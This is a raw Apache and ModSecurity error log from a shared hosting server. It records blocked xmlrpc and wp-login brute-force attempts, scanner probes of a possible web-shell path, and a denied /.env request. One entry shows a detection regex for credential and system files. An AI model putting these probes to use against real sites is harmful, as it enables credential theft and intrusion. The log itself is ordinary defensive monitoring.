[Tue May 26 16:09:11.955281 2026] [security2:error] [pid 773493:tid 773749] [client 106.219.85.83:6301] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4T5gy-Vk4jSdqTCRGnQAAAQM"]
[Tue May 26 16:09:11.955384 2026] [security2:error] [pid 773493:tid 773749] [client 106.219.85.83:6301] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4T5gy-Vk4jSdqTCRGnQAAAQM"]
[Tue May 26 16:09:12.265845 2026] [security2:error] [pid 773493:tid 773685] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4T5gy-Vk4jSdqTCRGmQAAAMM"]
[Tue May 26 16:09:12.800498 2026] [core:crit] [pid 773493:tid 773681] (13)Permission denied: [client 207.46.13.36:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:09:13.884499 2026] [security2:error] [pid 773493:tid 773691] [client 14.162.98.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4UZgy-Vk4jSdqTCRGxgAAAMk"]
[Tue May 26 16:09:14.771802 2026] [security2:error] [pid 773493:tid 773624] [client 103.44.52.196:33620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Upgy-Vk4jSdqTCRG5wAAAIY"]
[Tue May 26 16:09:14.771923 2026] [security2:error] [pid 773493:tid 773624] [client 103.44.52.196:33620] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Upgy-Vk4jSdqTCRG5wAAAIY"]
[Tue May 26 16:09:14.895051 2026] [security2:error] [pid 773493:tid 773625] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Upgy-Vk4jSdqTCRG4AAAAIc"]
[Tue May 26 16:09:16.399152 2026] [core:crit] [pid 773493:tid 773714] (13)Permission denied: [client 52.167.144.190:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:09:16.639858 2026] [security2:error] [pid 773493:tid 773747] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4VJgy-Vk4jSdqTCRHBwAAAQE"]
[Tue May 26 16:09:16.751511 2026] [security2:error] [pid 773493:tid 773495] [remote 95.216.117.13:32854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahV4VJgy-Vk4jSdqTCRHFAAAuQE"]
[Tue May 26 16:09:16.875210 2026] [autoindex:error] [pid 773493:tid 773651] [client 43.153.10.13:60912] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:09:18.932060 2026] [security2:error] [pid 773493:tid 773627] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Vpgy-Vk4jSdqTCRHPQAAAIk"]
[Tue May 26 16:09:20.010751 2026] [security2:error] [pid 773493:tid 773631] [client 85.208.96.202:40824] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-16th/day/2022-02-26/"] [unique_id "ahV4WJgy-Vk4jSdqTCRHWAAAAI0"]
[Tue May 26 16:09:20.010903 2026] [security2:error] [pid 773493:tid 773631] [client 85.208.96.202:40824] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-16th/day/2022-02-26/"] [unique_id "ahV4WJgy-Vk4jSdqTCRHWAAAAI0"]
[Tue May 26 16:09:21.181826 2026] [security2:error] [pid 773493:tid 773743] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4WJgy-Vk4jSdqTCRHYgAAAP0"]
[Tue May 26 16:09:22.267645 2026] [security2:error] [pid 773493:tid 773719] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4WZgy-Vk4jSdqTCRHgwAAAOU"]
[Tue May 26 16:09:22.672985 2026] [security2:error] [pid 773493:tid 773631] [client 106.219.85.83:12363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Wpgy-Vk4jSdqTCRHlwAAAI0"]
[Tue May 26 16:09:22.673166 2026] [security2:error] [pid 773493:tid 773631] [client 106.219.85.83:12363] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Wpgy-Vk4jSdqTCRHlwAAAI0"]
[Tue May 26 16:09:24.452817 2026] [security2:error] [pid 773493:tid 773642] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4XJgy-Vk4jSdqTCRHtwAAAJg"]
[Tue May 26 16:09:25.421511 2026] [security2:error] [pid 773493:tid 773666] [client 103.44.52.196:50450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4XZgy-Vk4jSdqTCRH0QAAALA"]
[Tue May 26 16:09:25.421672 2026] [security2:error] [pid 773493:tid 773666] [client 103.44.52.196:50450] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4XZgy-Vk4jSdqTCRH0QAAALA"]
[Tue May 26 16:09:26.669146 2026] [security2:error] [pid 773493:tid 773625] [client 114.119.156.126:56649] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV4Xpgy-Vk4jSdqTCRH6gAAAIc"], referer: http://haddingtonwines.com/cart?remove_item=6f518c31f6baa365f55c38d11cc349d1
[Tue May 26 16:09:26.991463 2026] [security2:error] [pid 773493:tid 773669] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Xpgy-Vk4jSdqTCRH5gAAALM"]
[Tue May 26 16:09:29.252334 2026] [security2:error] [pid 773493:tid 773710] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4YJgy-Vk4jSdqTCRIGwAAANw"]
[Tue May 26 16:09:30.641118 2026] [security2:error] [pid 773493:tid 773700] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Ypgy-Vk4jSdqTCRIKwAAANI"]
[Tue May 26 16:09:33.184377 2026] [security2:error] [pid 773493:tid 773640] [client 106.219.85.83:15097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4ZZgy-Vk4jSdqTCRIaAAAAJY"]
[Tue May 26 16:09:33.184666 2026] [security2:error] [pid 773493:tid 773640] [client 106.219.85.83:15097] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4ZZgy-Vk4jSdqTCRIaAAAAJY"]
[Tue May 26 16:09:33.252928 2026] [security2:error] [pid 773493:tid 773701] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4ZJgy-Vk4jSdqTCRIYAAAANM"]
[Tue May 26 16:09:35.205222 2026] [security2:error] [pid 773493:tid 773727] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Zpgy-Vk4jSdqTCRIkQAAAO0"]
[Tue May 26 16:09:35.880869 2026] [security2:error] [pid 773493:tid 773641] [client 103.44.52.196:36306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Z5gy-Vk4jSdqTCRIqAAAAJc"]
[Tue May 26 16:09:35.880973 2026] [security2:error] [pid 773493:tid 773641] [client 103.44.52.196:36306] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Z5gy-Vk4jSdqTCRIqAAAAJc"]
[Tue May 26 16:09:36.944053 2026] [security2:error] [pid 773493:tid 773627] [client 14.243.206.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4aJgy-Vk4jSdqTCRItwAAAIk"]
[Tue May 26 16:09:37.408994 2026] [security2:error] [pid 773493:tid 773678] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4aJgy-Vk4jSdqTCRIxAAAALw"]
[Tue May 26 16:09:38.178309 2026] [security2:error] [pid 773493:tid 773718] [client 193.37.33.152:42961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 152.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahV4aZgy-Vk4jSdqTCRI2QAAAOQ"]
[Tue May 26 16:09:38.478282 2026] [security2:error] [pid 773493:tid 773597] [remote 74.7.241.58:58722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahV4apgy-Vk4jSdqTCRI4wAAmmc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-includes/html-api
[Tue May 26 16:09:38.706031 2026] [security2:error] [pid 773493:tid 773712] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4apgy-Vk4jSdqTCRI3wAAAN4"]
[Tue May 26 16:09:41.663192 2026] [security2:error] [pid 773493:tid 773732] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4bZgy-Vk4jSdqTCRJKwAAAPI"]
[Tue May 26 16:09:43.654821 2026] [security2:error] [pid 773493:tid 773738] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4b5gy-Vk4jSdqTCRJVQAAAPg"]
[Tue May 26 16:09:43.720225 2026] [security2:error] [pid 773493:tid 773706] [client 106.219.85.83:11665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4b5gy-Vk4jSdqTCRJXgAAANg"]
[Tue May 26 16:09:43.720320 2026] [security2:error] [pid 773493:tid 773706] [client 106.219.85.83:11665] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4b5gy-Vk4jSdqTCRJXgAAANg"]
[Tue May 26 16:09:45.706075 2026] [security2:error] [pid 773493:tid 773677] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4cZgy-Vk4jSdqTCRJfwAAALs"]
[Tue May 26 16:09:46.258478 2026] [security2:error] [pid 773493:tid 773660] [client 103.44.52.196:57658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4cpgy-Vk4jSdqTCRJpAAAAKo"]
[Tue May 26 16:09:46.258714 2026] [security2:error] [pid 773493:tid 773660] [client 103.44.52.196:57658] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4cpgy-Vk4jSdqTCRJpAAAAKo"]
[Tue May 26 16:09:47.022880 2026] [security2:error] [pid 773493:tid 773737] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4cpgy-Vk4jSdqTCRJqAAAAPc"]
[Tue May 26 16:09:49.705232 2026] [security2:error] [pid 773493:tid 773736] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4dZgy-Vk4jSdqTCRJ4QAAAPY"]
[Tue May 26 16:09:51.860460 2026] [security2:error] [pid 773493:tid 773659] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4d5gy-Vk4jSdqTCRKIAAAAKk"]
[Tue May 26 16:09:53.177105 2026] [security2:error] [pid 773493:tid 773638] [client 114.119.133.192:34131] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "aastha-enterprises.com"] [uri "/img/gallery/pack1.png"] [unique_id "ahV4eZgy-Vk4jSdqTCRKQwAAAJQ"], referer: https://aastha-enterprises.com/packaging.html
[Tue May 26 16:09:53.237027 2026] [security2:error] [pid 773493:tid 773651] [client 118.68.37.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahV4dpgy-Vk4jSdqTCRKEQAAAKE"]
[Tue May 26 16:09:53.967977 2026] [security2:error] [pid 773493:tid 773619] [remote 74.7.241.58:43726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahV4eZgy-Vk4jSdqTCRKWQAA_30"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes/html-api
[Tue May 26 16:09:53.990157 2026] [security2:error] [pid 773493:tid 773681] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4eZgy-Vk4jSdqTCRKVQAAAL8"]
[Tue May 26 16:09:54.432600 2026] [security2:error] [pid 773493:tid 773675] [client 106.219.85.83:23871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4epgy-Vk4jSdqTCRKYAAAALk"]
[Tue May 26 16:09:54.432785 2026] [security2:error] [pid 773493:tid 773675] [client 106.219.85.83:23871] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4epgy-Vk4jSdqTCRKYAAAALk"]
[Tue May 26 16:09:54.531180 2026] [security2:error] [pid 773493:tid 773714] [client 40.77.167.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV4eZgy-Vk4jSdqTCRKSgAAAOA"]
[Tue May 26 16:09:55.894247 2026] [security2:error] [pid 773493:tid 773660] [client 77.68.83.86:52677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.onesoft.in"] [uri "/images/images/cache.php"] [unique_id "ahV4e5gy-Vk4jSdqTCRKfwAAAKo"], referer: www.google.com
[Tue May 26 16:09:55.902544 2026] [security2:error] [pid 773493:tid 773677] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4e5gy-Vk4jSdqTCRKcgAAALs"]
[Tue May 26 16:09:56.899179 2026] [security2:error] [pid 773493:tid 773653] [client 103.44.52.196:51080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4fJgy-Vk4jSdqTCRKjwAAAKM"]
[Tue May 26 16:09:56.899313 2026] [security2:error] [pid 773493:tid 773653] [client 103.44.52.196:51080] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4fJgy-Vk4jSdqTCRKjwAAAKM"]
[Tue May 26 16:09:57.464905 2026] [security2:error] [pid 773493:tid 773687] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4fZgy-Vk4jSdqTCRKmAAAAMU"]
[Tue May 26 16:09:58.040994 2026] [security2:error] [pid 773493:tid 773529] [remote 211.23.68.235:63176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahV4fZgy-Vk4jSdqTCRKpQAA4yM"]
[Tue May 26 16:09:58.623918 2026] [security2:error] [pid 773493:tid 773693] [client 196.115.35.185:39562] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env"] [unique_id "ahV4fpgy-Vk4jSdqTCRKuAAAAMs"]
[Tue May 26 16:09:59.827192 2026] [security2:error] [pid 773493:tid 773645] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4f5gy-Vk4jSdqTCRKywAAAJs"]
[Tue May 26 16:10:00.202472 2026] [security2:error] [pid 773493:tid 773692] [client 77.68.83.86:63374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.onesoft.in"] [uri "/images/images/cache.php"] [unique_id "ahV4gJgy-Vk4jSdqTCRK1wAAAMo"], referer: www.google.com
